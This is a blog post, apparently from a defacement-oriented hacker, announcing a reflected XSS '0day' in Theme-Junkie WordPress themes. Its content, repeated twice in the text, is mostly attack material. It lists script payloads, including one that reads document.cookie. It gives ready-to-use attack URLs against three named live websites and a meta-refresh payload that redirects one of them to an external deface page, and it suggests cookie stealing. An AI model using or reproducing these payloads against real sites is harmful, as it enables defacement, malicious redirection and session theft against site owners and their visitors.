#-Hey This is me Aitezaz In This Post I will Share My Wordpress Press Premium Themes 0day
The Premium Themes Of Wordpress Theme developer comapne Theme-Junkie Are vulnerable to Reflected XSS.
#
# [ Vulnerability Details ]
# Input Fields Are not Properly Sanitized Leading towards Cross Site scripting
# All Premium themes Vulnerable.
#
# - Visit Plugin theme Developer site
# http://www.theme-junkie.com/
#
# [ XSS CODE ]
# <script>alert("SOG WAs Here");</script>
# <script>alert(document.cookie);</script>
# <script>window.open("http://www.google.com/")</script>
#
# REflected XSS
# ==============
# http://SITE/?s=</script><script>alert("SOG WAs Here")</script>
#
# Vulnerable sites
# =====================
#
# 1- http://www.paknetmafia.com/
# Theme Name = The WordPress theme in use is called "forester" (Designed By Theme-Junkie)
# Vul = http://www.paknetmafia.com/?s=<script>alert("SOG WAS HERE")</script>
#
# 2- http://www.windows8update.com
# Theme Name = The WordPress theme in use is called "weekly". (Designed By Theme-Junkie)
# Vul = http://www.windows8update.com/?s=<script>alert("SOG WAS HERE")</script>
#
# 3- http://sharethemes.net
# Theme Name = The WordPress theme in use is called "sharethemes".(Designed By Theme-Junkie)
# Vul = http://sharethemes.net/?s=<script>alert("SOG WAS HERE")</script>
#
# *Example Of Non Persistent Reflected XSS :>
# * Redirecting Website To Our Deface PAge
# *Example site : http://www.paknetmafia.com
# Put this Code In the Search Bar or Paste After http://www.paknetmafia.com/?s= <html><meta Http-equiv="refresh" content="0;url=http://pak-pak.co.cc/deface.html/"></html>
# The Website Will Be Redirected To YoUr DEface PAge
#
# *You can Also Do cookie stealing
# Video Pr00f :
# Youtube =http://www.youtube.com/watch?v=U9jZlzi0uXY&feature=plcp
# VimeO = https://vimeo.com/50359725
# [ Vulnerability Details ]
# Input Fields Are not Properly Sanitized Leading towards Cross Site scripting
# All Premium themes Vulnerable.
#
# - Visit Plugin theme Developer site
# http://www.theme-junkie.com/
#
# [ XSS CODE ]
# <script>alert("SOG WAs Here");</script>
# <script>alert(document.cookie);</script>
# <script>window.open("http://www.google.com/")</script>
#
# REflected XSS
# ==============
# http://SITE/?s=</script><script>alert("SOG WAs Here")</script>
#
# Vulnerable sites
# =====================
#
# 1- http://www.paknetmafia.com/
# Theme Name = The WordPress theme in use is called "forester" (Designed By Theme-Junkie)
# Vul = http://www.paknetmafia.com/?s=<script>alert("SOG WAS HERE")</script>
#
# 2- http://www.windows8update.com
# Theme Name = The WordPress theme in use is called "weekly". (Designed By Theme-Junkie)
# Vul = http://www.windows8update.com/?s=<script>alert("SOG WAS HERE")</script>
#
# 3- http://sharethemes.net
# Theme Name = The WordPress theme in use is called "sharethemes".(Designed By Theme-Junkie)
# Vul = http://sharethemes.net/?s=<script>alert("SOG WAS HERE")</script>
#
# *Example Of Non Persistent Reflected XSS :>
# * Redirecting Website To Our Deface PAge
# *Example site : http://www.paknetmafia.com
# Put this Code In the Search Bar or Paste After http://www.paknetmafia.com/?s= <html><meta Http-equiv="refresh" content="0;url=http://pak-pak.co.cc/deface.html/"></html>
# The Website Will Be Redirected To YoUr DEface PAge
#
# *You can Also Do cookie stealing
# Video Pr00f :
# Youtube =http://www.youtube.com/watch?v=U9jZlzi0uXY&feature=plcp
# VimeO = https://vimeo.com/50359725
Plugins makes us to provide the good input fields, and it extends the look and functionality of our web site.
ReplyDeleteWordpress Themes
Good Job SOG Bro <3 :D
ReplyDeleteBy ScOrPiOn <3 :D